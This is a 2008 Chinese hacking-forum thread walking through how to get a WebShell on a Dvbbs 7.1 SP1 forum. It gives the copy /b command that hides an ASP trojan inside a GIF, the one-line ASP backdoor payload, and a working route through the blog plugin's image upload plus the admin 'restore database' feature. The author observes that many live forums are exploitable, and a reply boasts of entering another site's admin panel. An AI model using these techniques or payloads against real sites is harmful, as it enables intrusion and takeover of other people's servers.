Board logo

标题: 动网7.1SP1进后台靠博客得WebShell [打印本页]

作者: 平湖秋月    时间: 2008-10-22 14:34     标题: 动网7.1SP1进后台靠博客得WebShell

最近,一朋友让帮他做一个动网论坛。他对黑客技术一无所知,所以希望我在交给他之前,把论坛的安全设置做好。由于好久没有接触动网了,今天去动网的官方网站我才知道如今动网的版本已经出到了7.1 SP1了。当然啦,由于过去的7.0和7.1版本“千疮百孔”的漏洞,我不打算再用以前的版本了。所以我在网上帮他下载了这个最新的7.1SP1版。安装完新模版和朋友要求的插件以后,我便准备对它做一次安全检测。对于这个新的版本大家还不是很熟悉,相关的入侵的文章也非常少。我检测了一下  动网7.1SP1这个版本在安全性方面做的也确实非常地出色。不过百密一疏,我在一个非常意外的情况下还是找到了这个版本的一个非常不该有的漏洞。
  检测
  由于论坛是我架设的,所以我可以直接进入后台。一般我们进入后台要得到WebShell 的主要思路就是通过上传——备份数据库的方法。所以我主要是从这点入手的。
  第一次失败
  进入后台后,我在版面管理的高级设置里,将asp和asa两种格式添加进了“上传文件类型”里,然后到前台任意发一个帖子,在“文件上传”那里试图上传我的小马。
  后来在asp和asa后面加了一个空格,同样失败。其实这早在我预料中,因为在前几个版本中已经修补了这个漏洞了,要是在新的版本出现,那可就闹笑话了。
  第二次失败
  直接上传不成功,我就尝试用通过数据库备份的思路来得到WebShell 。老方法,将.asp木马的扩展名修改为.gif,然后打算到前台进行上传。可是结果一样无法上传。其实在7.1就无法通过这个方法上传了。于是我想到了在7.1的时候可以使用dos的copy命令将一个普通图片和asp木马合并为一个图片就可以上传成功了。于是立刻找了一个小马(名字为1.asp)和一张gif图片(名字为1.gif),使用命令:
copy 1.gif/b+1.asp 2.gif(命令书写中,二者的顺序不能改变)  合并得到了一个包含asp木马的图片2.gif。然后上传。本以为这样就能成功了,结果还是............。哎,郁闷…
  第三次失败
  我想了想,能不能将一句话木马插入到数据库中呢?于是先在前台的控制面版中,将自己的签名和介绍全都加入了“<%execute request("l")%>”(不包括双引号)。使用后台的“数据库备份”功能成功将默认的.mdb数据库备份为.asp的数据库了。然后在浏览器打开刚才备份好的asp数据库。
  大家都知道asp文件的“<%”和“%>”是成对出现的,否则无法在客户端正常显示。原来论坛系统对数据库文件做了过滤,导致缺少“%>”作为asp文件的结束符。
  第四次失败
  数据库行不通,那能不能利用论坛的配置文件插入一句话木马来得到WebShell 呢?于是我找了找源代码,在boke这个文件夹中找到了config.asp文件。于是马上到后台的博客设置中插入了一句话木马,并在一句话木马客户端执行。可结果依然令人非常失望,同样是提示缺少“%>”。

  偶然成功
  哎,看来是我技术还没学到家,看来动网的这个最新版本在安全方面做得几乎“无洞可破”了。正当我准备放弃之际,论坛前台的“博客(Boke)”引起了我的注意!博客功能是动网7.1SP1新开发的一个插件。我看了看,界面做得很清新朴实,非常不错。那它的安全性如何呢?抱着试一试的态度,我申请了一个博客用户。
  激活博客成功后,我在“发表文章”中找到了上传的地方。也没多想,习惯性地将一个.asp的asp木马改为.gif的图片木马尝试着上传。没想到,令人振奋的结果出现了!
  不过见识了7.1SP1的“牢不可破”后,自己心里还是有点发虚,不敢肯定后台能不能成功恢复为asp木马。进入后台,小心翼翼地打开“恢复数据库”。在“备份数据库路径(相对)”输入刚才图片上传后得到的路径。在“目标数据库路径”输入:sweet.asp。递交后提示恢复数据库成功。然后在IE地址栏输入刚才恢复数据库的asp路径,回车。不多久,终于看到了小马那可爱的画面了。
  接下来就是在“输入马的内容”填入我的大马代码,并正确填写马的路径,最后保存。保存成功后,在IE地址栏递交大马的地址,大家再熟悉不过的画面终于出现了。
  于是我终于成功得到了一个动网7.1SP1的WebShell 了。
  总结
  这次的漏洞检测可谓是一波三折啊。经过数次失败后,最后没想到却能利用这么老的漏洞得到一个WebShell 。动网7.1SP1这个版本在安全性方面是我所遇到的动网的各个版本中做得最好的,性能也是最稳定的。不过百密一疏啊,新开发的这个博客插件在上传的过滤方面做得却如此脆弱。希望动网官方能及时修补这个漏洞,因为我觉得博客这个插件做得非常好,不要因为这个小小的漏洞而让我们不得不关闭这个插件的功能。
  后来我通过百度搜索到了不少使用动网7.1SP1的论坛。但由于这个版本刚出来,很多人对它还不是很了解,而且很多安全设置还没有做,所以很多论坛都可以利用这个漏洞入侵。希望各位管理员在动网官方没发布相应的补丁前作好漏洞预防工作。也希望各位朋友重在技术的研究,不要用于违法用途。
作者: 柔肠寸断    时间: 2008-10-22 14:43

我今天进了一8.2的后台

还不知道怎么拿到webshell

汗死.............




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2